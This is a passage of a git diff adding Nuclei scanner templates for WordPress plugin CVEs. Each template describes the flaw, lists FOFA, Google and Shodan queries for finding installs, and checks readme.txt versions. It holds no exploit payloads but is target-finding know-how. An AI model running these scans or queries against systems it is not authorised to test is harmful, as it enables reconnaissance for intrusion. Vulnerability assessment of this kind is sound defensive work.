version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wpadcenter" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.5.7') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10308-e95e71d9b22aad1a339e647728650987.yaml b/poc/cve/CVE-2024-10308-e95e71d9b22aad1a339e647728650987.yaml new file mode 100644 index 0000000000..bb462ad690 --- /dev/null +++ b/poc/cve/CVE-2024-10308-e95e71d9b22aad1a339e647728650987.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10308-e95e71d9b22aad1a339e647728650987 + +info: + name: > + Jeg Elementor Kit <= 2.6.9 - Authenticated (Contributor+) Stored Cross-Site Scripting via JKit - Countdown Widget + author: topscoder + severity: low + description: > + The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's JKit - Countdown widget in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/98aed079-672c-43bb-a5eb-faf8ffc04b71?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-10308 + metadata: + fofa-query: "wp-content/plugins/jeg-elementor-kit/" + google-query: inurl:"/wp-content/plugins/jeg-elementor-kit/" + shodan-query: 'vuln:CVE-2024-10308' + tags: cve,wordpress,wp-plugin,jeg-elementor-kit,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jeg-elementor-kit/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jeg-elementor-kit" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.6.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10542-9cd3734bb0202544680880ac3ce86ba2.yaml b/poc/cve/CVE-2024-10542-9cd3734bb0202544680880ac3ce86ba2.yaml new file mode 100644 index 0000000000..4f834fdc41 --- /dev/null +++ b/poc/cve/CVE-2024-10542-9cd3734bb0202544680880ac3ce86ba2.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10542-9cd3734bb0202544680880ac3ce86ba2 + +info: + name: > + Spam protection, Anti-Spam, FireWall by CleanTalk <= 6.43.2 - Authorization Bypass via Reverse DNS Spoofing to Unauthenticated Arbitrary Plugin Installation + author: topscoder + severity: high + description: > + The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an authorization bypass via reverse DNS spoofing on the checkWithoutToken function in all versions up to, and including, 6.43.2. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d7eb5fad-bb62-4f0b-ad52-b16c3e442b62?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-10542 + metadata: + fofa-query: "wp-content/plugins/cleantalk-spam-protect/" + google-query: inurl:"/wp-content/plugins/cleantalk-spam-protect/" + shodan-query: 'vuln:CVE-2024-10542' + tags: cve,wordpress,wp-plugin,cleantalk-spam-protect,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cleantalk-spam-protect/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cleantalk-spam-protect" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.43.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml b/poc/cve/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml new file mode 100644 index 0000000000..efba34e940 --- /dev/null +++ b/poc/cve/CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10570-d0ebaa66e0fdb4a7b5c05832ecd238b9 + +info: + name: > + Security & Malware scan by CleanTalk <= 2.145 - Authorization Bypass via Reverse DNS Spoofing to Unauthenticated SQL Injection + author: topscoder + severity: high + description: > + The Security & Malware scan by CleanTalk plugin for WordPress is vulnerable to unauthorized SQL Injection due to an authorization bypass via reverse DNS spoofing on the checkWithoutToken function in all versions up to, and including, 2.145, as well as insufficient input sanitization and validation. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2187311d-6651-4eca-806d-aa2ff9fae4e2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2024-10570 + metadata: + fofa-query: "wp-content/plugins/security-malware-firewall/" + google-query: inurl:"/wp-content/plugins/security-malware-firewall/" + shodan-query: 'vuln:CVE-2024-10570' + tags: cve,wordpress,wp-plugin,security-malware-firewall,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/security-malware-firewall/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "security-malware-firewall" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.145') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10579-3b42e924fd20aca47fa65689d369e300.yaml b/poc/cve/CVE-2024-10579-3b42e924fd20aca47fa65689d369e300.yaml new file mode 100644 index 0000000000..3b26f607f7 --- /dev/null +++ b/poc/cve/CVE-2024-10579-3b42e924fd20aca47fa65689d369e300.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10579-3b42e924fd20aca47fa65689d369e300 + +info: + name: > + Hustle – Email Marketing, Lead Generation, Optins, Popups <= 7.8.5 - Missing Authorization to Unpublished Form Exposure + author: topscoder + severity: low + description: > + The Hustle – Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the preview_module() function in all versions up to, and including, 7.8.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view unpublished forms. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ebd96d9c-c1ab-4a53-a52a-9fc2541482f2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10579 + metadata: + fofa-query: "wp-content/plugins/wordpress-popup/" + google-query: inurl:"/wp-content/plugins/wordpress-popup/" + shodan-query: 'vuln:CVE-2024-10579' + tags: cve,wordpress,wp-plugin,wordpress-popup,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wordpress-popup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wordpress-popup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.8.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10632-ce98811461e8d024a9032e659d9f6dc9.yaml b/poc/cve/CVE-2024-10632-ce98811461e8d024a9032e659d9f6dc9.yaml new file mode 100644 index 0000000000..e5633602ab --- /dev/null +++ b/poc/cve/CVE-2024-10632-ce98811461e8d024a9032e659d9f6dc9.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10632-ce98811461e8d024a9032e659d9f6dc9 + +info: + name: > + Nokaut Offers Box <= 1.4.0 - Authenticated (Administrator+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Nokaut Offers Box plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e0dd2417-54b5-4838-88da-1893559bd255?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-10632 + metadata: + fofa-query: "wp-content/plugins/nokaut-offers-box/" + google-query: inurl:"/wp-content/plugins/nokaut-offers-box/" + shodan-query: 'vuln:CVE-2024-10632' + tags: cve,wordpress,wp-plugin,nokaut-offers-box,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/nokaut-offers-box/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "nokaut-offers-box" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10634-1cfffc62bc3024e3b58ab7adce57d49d.yaml b/poc/cve/CVE-2024-10634-1cfffc62bc3024e3b58ab7adce57d49d.yaml new file mode 100644 index 0000000000..3b2484fd11 --- /dev/null +++ b/poc/cve/CVE-2024-10634-1cfffc62bc3024e3b58ab7adce57d49d.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10634-1cfffc62bc3024e3b58ab7adce57d49d + +info: + name: > + Nokaut Offers Box <= 1.4.0 - Cross-Site Request Forgery to Plugin Setting Reset + author: topscoder + severity: medium + description: > + The Nokaut Offers Box plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4.0. This is due to missing or incorrect nonce validation on one of its functions. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2f6d43ad-d1b9-4f66-ba08-d0ffc235f7c8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10634 + metadata: + fofa-query: "wp-content/plugins/nokaut-offers-box/" + google-query: inurl:"/wp-content/plugins/nokaut-offers-box/" + shodan-query: 'vuln:CVE-2024-10634' + tags: cve,wordpress,wp-plugin,nokaut-offers-box,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/nokaut-offers-box/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "nokaut-offers-box" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.4.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10677-17d70666036f25fcf74aa1320bac4cf3.yaml b/poc/cve/CVE-2024-10677-17d70666036f25fcf74aa1320bac4cf3.yaml new file mode 100644 index 0000000000..1d9ed48ebb --- /dev/null +++ b/poc/cve/CVE-2024-10677-17d70666036f25fcf74aa1320bac4cf3.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10677-17d70666036f25fcf74aa1320bac4cf3 + +info: + name: > + BTEV <= Cross-Site Request Forgery to Plugin Settings Update + author: topscoder + severity: medium + description: > + The BTEV plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.2. This is due to missing or incorrect nonce validation on one of its functions. This makes it possible for unauthenticated attackers to change the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/215be163-f362-4bda-b81a-65ec955968a2?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10677 + metadata: + fofa-query: "wp-content/plugins/bluetrait-event-viewer/" + google-query: inurl:"/wp-content/plugins/bluetrait-event-viewer/" + shodan-query: 'vuln:CVE-2024-10677' + tags: cve,wordpress,wp-plugin,bluetrait-event-viewer,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bluetrait-event-viewer/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bluetrait-event-viewer" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10729-176c3f5bae8556ce3b12e234c357e170.yaml b/poc/cve/CVE-2024-10729-176c3f5bae8556ce3b12e234c357e170.yaml new file mode 100644 index 0000000000..b1a40745b4 --- /dev/null +++ b/poc/cve/CVE-2024-10729-176c3f5bae8556ce3b12e234c357e170.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10729-176c3f5bae8556ce3b12e234c357e170 + +info: + name: > + Booking & Appointment Plugin for WooCommerce <= 6.9.0 - Authenticated (Subscriber+) Arbitrary Option Update + author: topscoder + severity: low + description: > + The Booking & Appointment Plugin for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'save_google_calendar_data' function in versions up to, and including, 6.9.0. This makes it possible for authenticated attackers, with subscriber-level permissions or above to update the site options arbitrarily. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/6ed215da-10c5-469b-bab2-923808feebd4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-10729 + metadata: + fofa-query: "wp-content/plugins/woocommerce-booking/" + google-query: inurl:"/wp-content/plugins/woocommerce-booking/" + shodan-query: 'vuln:CVE-2024-10729' + tags: cve,wordpress,wp-plugin,woocommerce-booking,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woocommerce-booking/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woocommerce-booking" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.9.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10781-3c798af34f43aabb0c7903d65e6243ce.yaml b/poc/cve/CVE-2024-10781-3c798af34f43aabb0c7903d65e6243ce.yaml new file mode 100644 index 0000000000..8df4a8591b --- /dev/null +++ b/poc/cve/CVE-2024-10781-3c798af34f43aabb0c7903d65e6243ce.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10781-3c798af34f43aabb0c7903d65e6243ce + +info: + name: > + Spam protection, Anti-Spam, FireWall by CleanTalk <= 6.44 - Authorization Bypass due to Missing Empty Value Check to Unauthenticated Arbitrary Plugin Installation + author: topscoder + severity: high + description: > + The Spam protection, Anti-Spam, FireWall by CleanTalk plugin for WordPress is vulnerable to unauthorized Arbitrary Plugin Installation due to an missing empty value check on the 'api_key' value in the 'perform' function in all versions up to, and including, 6.44. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/79ae062c-b084-4045-9407-2d94919993af?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.1 + cve-id: CVE-2024-10781 + metadata: + fofa-query: "wp-content/plugins/cleantalk-spam-protect/" + google-query: inurl:"/wp-content/plugins/cleantalk-spam-protect/" + shodan-query: 'vuln:CVE-2024-10781' + tags: cve,wordpress,wp-plugin,cleantalk-spam-protect,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cleantalk-spam-protect/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cleantalk-spam-protect" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.44') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10813-148804687e2659312d74d49090ab4b03.yaml b/poc/cve/CVE-2024-10813-148804687e2659312d74d49090ab4b03.yaml new file mode 100644 index 0000000000..32bd703fd8 --- /dev/null +++ b/poc/cve/CVE-2024-10813-148804687e2659312d74d49090ab4b03.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10813-148804687e2659312d74d49090ab4b03 + +info: + name: > + Product Table for WooCommerce by CodeAstrology (wooproducttable.com) <= 3.5.1 - Information Exposure + author: topscoder + severity: medium + description: > + The Product Table for WooCommerce by CodeAstrology (wooproducttable.com) plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.5.1 via the var_dump_table parameter. This makes it possible for unauthenticated attackers var data. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e67f680a-8942-45fa-8458-a27c78045aa1?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-10813 + metadata: + fofa-query: "wp-content/plugins/woo-product-table/" + google-query: inurl:"/wp-content/plugins/woo-product-table/" + shodan-query: 'vuln:CVE-2024-10813' + tags: cve,wordpress,wp-plugin,woo-product-table,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-product-table/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-product-table" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10857-23fefb4ad602dc6fc5eb054c7496a8dd.yaml b/poc/cve/CVE-2024-10857-23fefb4ad602dc6fc5eb054c7496a8dd.yaml new file mode 100644 index 0000000000..913ecb5e2e --- /dev/null +++ b/poc/cve/CVE-2024-10857-23fefb4ad602dc6fc5eb054c7496a8dd.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10857-23fefb4ad602dc6fc5eb054c7496a8dd + +info: + name: > + Product Input Fields for WooCommerce <= 1.9 - Authenticated (Contributor+) Arbitrary File Read + author: topscoder + severity: low + description: > + The Product Input Fields for WooCommerce plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.9 via the handle_downloads() function due to insufficient file path validation/sanitization. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e45207af-3886-4d95-9cd8-5ecdc683dc58?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2024-10857 + metadata: + fofa-query: "wp-content/plugins/product-input-fields-for-woocommerce/" + google-query: inurl:"/wp-content/plugins/product-input-fields-for-woocommerce/" + shodan-query: 'vuln:CVE-2024-10857' + tags: cve,wordpress,wp-plugin,product-input-fields-for-woocommerce,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/product-input-fields-for-woocommerce/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "product-input-fields-for-woocommerce" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-10868-6d18d5fe018eb3e8d3d83de279d87c0e.yaml b/poc/cve/CVE-2024-10868-6d18d5fe018eb3e8d3d83de279d87c0e.yaml new file mode 100644 index 0000000000..2a8d62e021 --- /dev/null +++ b/poc/cve/CVE-2024-10868-6d18d5fe018eb3e8d3d83de279d87c0e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-10868-6d18d5fe018eb3e8d3d83de279d87c0e + +info: + name: > + Enter Addons – Ultimate Template Builder for Elementor <= 2.1.9 - Authenticated (Contributor+) Post Disclosure + author: topscoder + severity: low + description: > + The Enter Addons – Ultimate Template Builder for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.1.9 via the Advanced Tabs widget due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/ff8e8889-ec02-4b8d-9509-2c6335fdd9a4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.3 + cve-id: CVE-2024-10868 + metadata: + fofa-query: "wp-content/plugins/enteraddons/" + google-query: inurl:"/wp-content/plugins/enteraddons/" + shodan-query: 'vuln:CVE-2024-10868' + tags: cve,wordpress,wp-plugin,enteraddons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/enteraddons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "enteraddons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11002-bb89910755dac308dc83c1e533f25239.yaml b/poc/cve/CVE-2024-11002-bb89910755dac308dc83c1e533f25239.yaml new file mode 100644 index 0000000000..77e888bf8b --- /dev/null +++ b/poc/cve/CVE-2024-11002-bb89910755dac308dc83c1e533f25239.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11002-bb89910755dac308dc83c1e533f25239 + +info: + name: > + InPost Gallery <= 2.1.4.2 - Authenticated (Subscriber+) Arbitrary Shortcode Execution via inpost_gallery_get_shortcode_template + author: topscoder + severity: low + description: > + The The InPost Gallery plugin for WordPress is vulnerable to arbitrary shortcode execution via the inpost_gallery_get_shortcode_template AJAX action in all versions up to, and including, 2.1.4.2. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/5fbb2dcf-38b8-4ef1-bfea-bf5872cc7e37?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L + cvss-score: 6.3 + cve-id: CVE-2024-11002 + metadata: + fofa-query: "wp-content/plugins/inpost-gallery/" + google-query: inurl:"/wp-content/plugins/inpost-gallery/" + shodan-query: 'vuln:CVE-2024-11002' + tags: cve,wordpress,wp-plugin,inpost-gallery,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/inpost-gallery/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "inpost-gallery" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.4.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11024-47f8599da025c3dd9d60a7fed198eb3e.yaml b/poc/cve/CVE-2024-11024-47f8599da025c3dd9d60a7fed198eb3e.yaml new file mode 100644 index 0000000000..0f7bbe3ba0 --- /dev/null +++ b/poc/cve/CVE-2024-11024-47f8599da025c3dd9d60a7fed198eb3e.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11024-47f8599da025c3dd9d60a7fed198eb3e + +info: + name: > + AppPresser – Mobile App Framework <= 4.4.6 - Unauthenticated Privilege Escalation via Password Reset + author: topscoder + severity: critical + description: > + The AppPresser – Mobile App Framework plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 4.4.6. This is due to the plugin not properly validating a user's password reset code prior to updating their password. This makes it possible for unauthenticated attackers, with knowledge of a user's email address, to reset the user's password and gain access to their account. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/43cb0399-4add-43d5-863c-30e11803bd90?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-11024 + metadata: + fofa-query: "wp-content/plugins/apppresser/" + google-query: inurl:"/wp-content/plugins/apppresser/" + shodan-query: 'vuln:CVE-2024-11024' + tags: cve,wordpress,wp-plugin,apppresser,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/apppresser/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "apppresser" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.4.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-11032-4ea7351ae274d6588df316b48df1d0e7.yaml b/poc/cve/CVE-2024-11032-4ea7351ae274d6588df316b48df1d0e7.yaml new file mode 100644 index 0000000000..72a5c67f59 --- /dev/null +++ b/poc/cve/CVE-2024-11032-4ea7351ae274d6588df316b48df1d0e7.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-11032-4ea7351ae274d6588df316b48df1d0e7 + +info: + name: > + Parsi Date <= 5.1.1 - Reflected Cross-Site Scripting via add_query_arg Parameter + author: topscoder + severity: medium + description: > + The Parsi Date plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.1.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/72383bd3-82b4-4aea-9a1c-277ad06e2500?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-11032 + metadata: + fofa-query: "wp-content/plugins/wp-parsidate/" + google-query: inurl:"/wp-content/plugins/wp-parsidate/" + shodan-query: 'vuln:CVE-2024-11032' + tags: cve,wordpress,wp-plugin,wp-parsidate,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-parsidate/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: 